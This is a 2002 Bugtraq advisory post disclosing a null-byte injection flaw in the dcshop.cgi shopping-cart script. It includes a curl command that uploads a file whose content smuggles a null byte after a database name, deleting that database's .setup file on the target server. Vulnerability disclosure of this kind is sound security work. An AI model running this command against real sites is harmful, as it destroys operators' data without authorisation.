[24818] in bugtraq
dcshop.cgi anybody can delete *.setup for database
daemon@ATHENA.MIT.EDU (pokleyzz sakamaniaka)
Mon Mar 25 15:36:39 2002
Date: 25 Mar 2002 09:10:52 -0000
Message-ID: <20020325091052.31868.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: pokleyzz sakamaniaka <pokleyzz@hotmail.com>
To: bugtraq@securityfocus.com
cgi-pl in dcshop beta (http://www.dcscripts.com)
allow user to using nullbyte character for variable if
using multipart/form data type form.
Using curl (http://curl.haxx.se/libcurl/) :
curl -F database=@test.txt http://host/cgi-
bin/dcshop.cgi
which test.txt contain databasename.setup[nullbyte]
will couse database.setup file being deleted